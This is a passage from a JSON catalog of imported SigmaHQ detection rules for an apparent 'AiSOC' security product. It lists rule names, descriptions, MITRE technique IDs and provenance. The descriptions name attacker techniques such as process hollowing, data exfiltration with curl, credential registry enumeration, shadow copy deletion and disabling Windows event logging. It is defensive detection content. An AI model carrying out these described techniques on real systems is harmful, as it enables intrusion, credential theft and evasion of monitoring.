"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_disable_service.yml" } }, { "id": "sigmahq-sigma-85cce894-dd8b-4427-a958-5cc47a4dc9b9", "type": "detection", "name": "Remote Utilities Host Service Install", "description": "Detects Remote Utilities Host service installation on the target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-utilities-host-service-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml" } }, { "id": "sigmahq-sigma-85d23b42-9a9d-4f8f-b3d7-d2733c1d58f5", "type": "detection", "name": "HackTool - HollowReaper Execution", "description": "Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.\nIt replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-hollowreaper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85d23b42-9a9d-4f8f-b3d7-d2733c1d58f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_hollowreaper.yml" } }, { "id": "sigmahq-sigma-85de1f22-d189-44e4-8239-dc276b45379b", "type": "detection", "name": "Curl Web Request With Potential Custom User-Agent", "description": "Detects execution of \"curl.exe\" with a potential custom \"User-Agent\". Attackers can leverage this to download or exfiltrate data via \"curl\" to a domain that only accept specific \"User-Agent\" strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/curl-web-request-with-potential-custom-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85de1f22-d189-44e4-8239-dc276b45379b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml" } }, { "id": "sigmahq-sigma-85de3a19-b675-4a51-bfc6-b11a5186c971", "type": "detection", "name": "Potential Discovery Activity Using Find - MacOS", "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-discovery-activity-using-find-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85de3a19-b675-4a51-bfc6-b11a5186c971", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml" } }, { "id": "sigmahq-sigma-85f520e7-6f5e-43ca-874c-222e5bf9c0de", "type": "detection", "name": "Devcon Execution Disabling VMware VMCI Device", "description": "Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device.\nThis can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device.\nThis has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/devcon-execution-disabling-vmware-vmci-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85f520e7-6f5e-43ca-874c-222e5bf9c0de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver.yml" } }, { "id": "sigmahq-sigma-85ff530b-261d-48c6-a441-facaa2e81e48", "type": "detection", "name": "New Service Creation Using Sc.EXE", "description": "Detects the creation of a new service using the \"sc.exe\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-service-creation-using-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "85ff530b-261d-48c6-a441-facaa2e81e48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_create_service.yml" } }, { "id": "sigmahq-sigma-86157017-c2b1-4d4a-8c33-93b8e67e4af4", "type": "detection", "name": "Potential Suspicious Change To Sensitive/Critical Files", "description": "Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.\nThese files include, but are not limited to, system configuration files, authentication files, and critical application files.\nAttackers often target these files to maintain persistence, escalate privileges, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-change-to-sensitive-critical-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "86157017-c2b1-4d4a-8c33-93b8e67e4af4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml" } }, { "id": "sigmahq-sigma-8622c92d-c00e-463c-b09d-fd06166f6794", "type": "detection", "name": "Github High Risk Configuration Disabled", "description": "Detects when a user disables a critical security feature for an organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-high-risk-configuration-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8622c92d-c00e-463c-b09d-fd06166f6794", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_disable_high_risk_configuration.yml" } }, { "id": "sigmahq-sigma-863218bd-c7d0-4c52-80cd-0a96c09f54af", "type": "detection", "name": "Arbitrary File Download Via IMEWDBLD.EXE", "description": "Detects usage of \"IMEWDBLD.exe\" to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-imewdbld-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "863218bd-c7d0-4c52-80cd-0a96c09f54af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_imewbdld_download.yml" } }, { "id": "sigmahq-sigma-86588b36-c6d3-465f-9cee-8f9093e07798", "type": "detection", "name": "Scheduled Task Executing Payload from Registry", "description": "Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executing-payload-from-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "86588b36-c6d3-465f-9cee-8f9093e07798", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" } }, { "id": "sigmahq-sigma-867356ee-9352-41c9-a8f2-1be690d78216", "type": "detection", "name": "Potentially Suspicious Regsvr32 HTTP/FTP Pattern", "description": "Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-regsvr32-http-ftp-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "867356ee-9352-41c9-a8f2-1be690d78216", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml" } }, { "id": "sigmahq-sigma-869b9ca7-9ea2-4a5a-8325-e80e62f75445", "type": "detection", "name": "Suspicious Child Process Of SQL Server", "description": "Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-sql-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml" } }, { "id": "sigmahq-sigma-86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - Powershell", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" } }, { "id": "sigmahq-sigma-871b9555-69ca-4993-99d3-35a59f9f3599", "type": "detection", "name": "Suspicious UltraVNC Execution", "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ultravnc-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "871b9555-69ca-4993-99d3-35a59f9f3599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml" } }, { "id": "sigmahq-sigma-87261fb2-69d0-42fe-b9de-88c6b5f65a43", "type": "detection", "name": "Atera Agent Installation", "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/atera-agent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml" } }, { "id": "sigmahq-sigma-8737b7f6-8df3-4bb7-b1da-06019b99b687", "type": "detection", "name": "Shell Invocation Via Ssh - Linux", "description": "Detects the use of the \"ssh\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-invocation-via-ssh-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8737b7f6-8df3-4bb7-b1da-06019b99b687", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml" } }, { "id": "sigmahq-sigma-87911521-7098-470b-a459-9a57fc80bdfd", "type": "detection", "name": "Sysmon Configuration Update", "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87911521-7098-470b-a459-9a57fc80bdfd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml" } }, { "id": "sigmahq-sigma-87a476dc-0079-4583-a985-dee7a20a03de", "type": "detection", "name": "Enumeration for 3rd Party Creds From CLI", "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumeration-for-3rd-party-creds-from-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87a476dc-0079-4583-a985-dee7a20a03de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml" } }, { "id": "sigmahq-sigma-87cc6698-3e07-4ba2-9b43-a85a73e151e2", "type": "detection", "name": "Bitbucket User Permissions Export Attempt", "description": "Detects user permission data export attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213", "T1082", "T1591.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-permissions-export-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87cc6698-3e07-4ba2-9b43-a85a73e151e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml" } }, { "id": "sigmahq-sigma-87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "type": "detection", "name": "Delete Volume Shadow Copies Via WMI With PowerShell", "description": "Shadow Copies deletion using operating systems utilities via PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/delete-volume-shadow-copies-via-wmi-with-powershell.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" } }, { "id": "sigmahq-sigma-87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "type": "detection", "name": "Change PowerShell Policies to an Insecure Level", "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-powershell-policies-to-an-insecure-level.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml" } }, { "id": "sigmahq-sigma-880973f3-9708-491c-a77b-2a35a1921158", "type": "detection", "name": "Linux Shell Pipe to Shell", "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-shell-pipe-to-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "880973f3-9708-491c-a77b-2a35a1921158", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" } }, { "id": "sigmahq-sigma-881b7725-47cc-4055-8000-425823344c59", "type": "detection", "name": "CodeIntegrity - Revoked Image Loaded", "description": "Detects image load events with revoked certificates by code integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-revoked-image-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "881b7725-47cc-4055-8000-425823344c59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml" } }, { "id": "sigmahq-sigma-8823e85d-31d8-473e-b7f4-92da070f0fc6", "type": "detection", "name": "Suspicious ShellExec_RunDLL Call Via Ordinal", "description": "Detects suspicious call to the \"ShellExec_RunDLL\" exported function of SHELL32.DLL through the ordinal number to launch other commands.\nAdversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shellexec-rundll-call-via-ordinal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8823e85d-31d8-473e-b7f4-92da070f0fc6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_ordinal_execution.yml" } }, { "id": "sigmahq-sigma-882e858a-3233-4ba8-855e-2f3d3575803d", "type": "detection", "name": "DNS Query Request By QuickAssist.EXE", "description": "Detects DNS queries initiated by \"QuickAssist.exe\" to Microsoft Quick Assist primary endpoint that is used to establish a session.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-request-by-quickassist-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "882e858a-3233-4ba8-855e-2f3d3575803d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_quickassist.yml" } }, { "id": "sigmahq-sigma-882fbe50-d8d7-4e29-ae80-0648a8556866", "type": "detection", "name": "Crash Dump Created By Operating System", "description": "Detects \"BugCheck\" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file path, and report ID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crash-dump-created-by-operating-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "882fbe50-d8d7-4e29-ae80-0648a8556866", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_wer_systemerrorreporting/win_system_crash_dump_created.yml" } }, { "id": "sigmahq-sigma-8834e2f7-6b4b-4f09-8906-d2276470ee23", "type": "detection", "name": "PsExec/PAExec Escalation to LOCAL SYSTEM", "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-paexec-escalation-to-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" } }, { "id": "sigmahq-sigma-883835a7-df45-43e4-bf1d-4268768afda4", "type": "detection", "name": "Regedit as Trusted Installer", "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regedit-as-trusted-installer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "883835a7-df45-43e4-bf1d-4268768afda4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml" } }, { "id": "sigmahq-sigma-8839e550-52d7-4958-9f2f-e13c1e736838", "type": "detection", "name": "Security Event Logging Disabled via MiniNt Registry Key - Registry Set", "description": "Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.\nWindows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.\nAdversary may want to disable this service to disable logging of security events which could be used to detect their activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-event-logging-disabled-via-minint-registry-key-registry-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8839e550-52d7-4958-9f2f-e13c1e736838", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_create_minint_key.yml" } }, { "id": "sigmahq-sigma-883faa95-175a-4e22-8181-e5761aeb373c", "type": "detection", "name": "Suspicious Service Binary Directory", "description": "Detects a service binary running in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-binary-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "883faa95-175a-4e22-8181-e5761aeb373c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" } }, { "id": "sigmahq-sigma-88656cec-6c3b-487c-82c0-f73ebb805503", "type": "detection", "name": "Remote Access Tool - UltraViewer Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within 